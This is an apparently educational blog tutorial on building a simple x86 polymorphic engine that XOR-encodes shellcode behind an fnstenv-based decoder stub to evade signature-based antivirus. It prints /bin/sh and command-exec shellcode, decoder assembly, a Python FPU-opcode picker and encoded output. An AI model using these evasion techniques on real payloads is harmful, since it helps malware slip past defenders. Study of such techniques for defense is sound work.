Writing a Simple Polymorphic Engine

Polymorphism

The word polymorphism has Greek roots which means “having many forms”. In this context, polymorphism refers to a common antivirus evasion technique where shellcode/binaries are encrypted or obfuscated to go undetected. A polymorphic engine generates different code each time that does the same thing. In other words, code that is semantically different but functionally same. This makes signature based detection difficult because each time, the code generated is different.

Considering a piece of shellcode that executes /bin/sh from Shell Storm:

xor eax,eax
push eax
push dword 0x68732f2f
push dword 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
int 0x80

Most of the shellcodes that execute /bin/sh are structured in a similar way. This makes signature based detection easy. Especially the data being pushed 0x68732f2f (hs//) & 0x6e69622f (nib/). Putting this through the polymorhic engine generates the following instructions:

fcmovu st7
fnstenv [esp-0x9]
mov edx,[esp+0x3]
mov cl,0x17
mov bl,0xc9
xor [edx+ecx+0x13],bl
loop 0xe
clc
or [ecx-0x4519195f],ebx
mov eax,[0xa0abe6a1]
cmpsd
inc eax
sub bl,[ecx+0x7928409a]
ret 0x4904

Though the instructions look very different, they do the same thing - spawning a shell.


The Engine

This polymorphic engine is very simple. It works on x86 32 bits only. There is no functionality to specify badchars even, as of now, though I plan to put more work into it.

Polymorphic engines are an old topic. AVs now have heuristics, sandboxing and the like to detect polymorphic code. There are also much more advanced evasion techniques out there now. Nonetheless, this has been a very rewarding learning experience for me and I hope you will enjoy it too.

Overview

The engine reads the bytes and does a XOR operation on them with a random one byte key. A decoder stub is put before the encoded payload which decodes the instructions at run time and passes execution to it. The decoder stub carries the risk of being fingerprinted and having signatures generated against it. To mitigate this, random registers/offsets, ciphers/encoding methods, different looking decipher/decoding routines etc., can be used.

GetPC/GetEIP Routine

The decoder stub needs to know where it is being executed in memory to calculate the offsets, decode and pass control to the payload. This cannot be hardcoded into the stub because shellcode, usually do not have any control on where they’re made to execute from. Thus arises the need for getting the EIP (Extended Instruction Pointer)/PC (Program Counter) dynamically.

There are multiple ways to do this, but I’ve chosen the fnstenv method. The fnstenv instruction is part of the FPU instruction set. It writes a data structure at the location passed as an operand, which contains the address of the last executed FPU instruction.

The data structure:

DEST[FPUControlWord] ← FPUControlWord;
DEST[FPUStatusWord] ← FPUStatusWord;
DEST[FPUTagWord] ← FPUTagWord;
DEST[FPUDataPointer] ← FPUDataPointer;
DEST[FPUInstructionPointer] ← FPUInstructionPointer;
DEST[FPULastInstructionOpcode] ← FPULastInstructionOpcode;

FPUDataPointer is a pointer to the last executed FPU instruction.

It is possible to get the instruction pointer by doing something like this:

global _start

section .text

_start:
    ; FPU instruction
    fcmovnu st0
    
    ; save current FPU operating
    ; environment at a given
    ; location, which includes
    ; an address of the last 
    ; executed FPU instruction
    
    ; The structure is as follows:
    ; DEST[FPUControlWord] ← FPUControlWord;
    ; DEST[FPUStatusWord] ← FPUStatusWord;
    ; DEST[FPUTagWord] ← FPUTagWord;
    ; DEST[FPUDataPointer] ← FPUDataPointer;
    ; DEST[FPUInstructionPointer] ← FPUInstructionPointer;
    ; DEST[FPULastInstructionOpcode] ← FPULastInstructionOpcode;
    
    ; FPUDataPointer has the address we need
    ; writing the data structure from
    ; esp-0xc puts the FPUDataPointer right on
    ; top of esp
    fnstenv [esp-0xc]
    ; edi now has the address
    ; of the last executed
    ; FPU instruction, which
    ; is used to relatively 
    ; address other stuff
    pop edi

The registers and the ESP offsets are chosen randomly to increase the uniqueness of the generated code. You can get really creative to make the decoder stub look different each time.

There are a bunch of two byte FPU instructions which have default operands that we can use. Metasploit’s shikata_ga_nai encoder uses the same the method and it generates the usuable FPU instructions in an elegant way, which I’ve ported to Python:

def get_random_fpu_instruction():
    """Returns a random FPU instruction.

    Ported to python from metasploit's shikata_ga_nai.rb
    """

    fpu_opcodes = list()

    # D9E8 - D9 EE
    for opcode in range(0xe8, 0xee+1):
        fpu_opcodes.append(bytes([0xd9, opcode]))

    # D9C0 - D9CF
    for opcode in range(0xc0, 0xcf+1):
        fpu_opcodes.append(bytes([0xd9, opcode]))

    # DAC0 - DADF
    for opcode in range(0xc0, 0xdf+1):
        fpu_opcodes.append(bytes([0xda, opcode]))

    # DBC0 - DBDF
    for opcode in range(0xc0, 0xdf+1):
        fpu_opcodes.append(bytes([0xdb, opcode]))

    # DDC0 - DDC7
    for opcode in range(0xc0, 0xc7+1):
        fpu_opcodes.append(bytes([0xdd, opcode]))

    fpu_opcodes.append(bytes([0xd9, 0xd0]))
    fpu_opcodes.append(bytes([0xd9, 0xe1]))
    fpu_opcodes.append(bytes([0xd9, 0xf6]))
    fpu_opcodes.append(bytes([0xd9, 0xf7]))
    fpu_opcodes.append(bytes([0xd9, 0xe5]))

    return random.choice(fpu_opcodes)

Stub

Once the EIP or some address relative to it is know, we can calculate other address relative to it, such as the start/end of the encoded payload. With all the needed info in different registers, decoding is done:

; payload length
mov cl, 0x26
; xor key
mov bl, 0xab

; decode subroutine
decode:
    ; eax has the PC
    ; cl is the payload length
    ; which is decremented for
    ; each loop
    xor [eax + cl + 0x11], bl;
    loop decode;
payload:
    ; encoded payload here

Once the decoding is done, the execution control is passed on to the the decoded payload just after the decode subroutine.


Metasploit’s linux/x86/exec payload which executes id:

push byte +0xb
pop eax
cdq
push edx
push word 0x632d
mov edi,esp
push dword 0x68732f
push dword 0x6e69622f
mov ebx,esp
push edx
call 0x20
imul esp,[eax+eax+0x57],dword 0xcde18953
db 0x80

Putting it through the engine:

fxch st2
fnstenv [esp]
pop eax
pop esi
pop eax
pop esi
mov cl,0x26
mov bl,0xf9
xor [esi+ecx+0x13],bl
loop 0xd
xchg eax,ebx
repne mov eax,[0x919fab60]
aam 0x9a
jo 0x3c
xchg eax,ecx
salc
mov dl,[ecx-0x64296e07]
nop
xchg eax,edi
jo 0x44
stosd
adc edx,edi
stc
stc
stc
nop
popf
stc
scasb
stosb
jo 0x4f
xor al,0x79

Disclaimer: Everything on this site is for educational purposes only. If you’re looking to hack into unauthorized systems or do something illegal, please look elsewhere.

The project is available on GitHub with an MIT license: https://github.com/0x5FC3/spe.py

Constructive criticism, feedback, suggestions and PRs welcome!

- 0x5FC3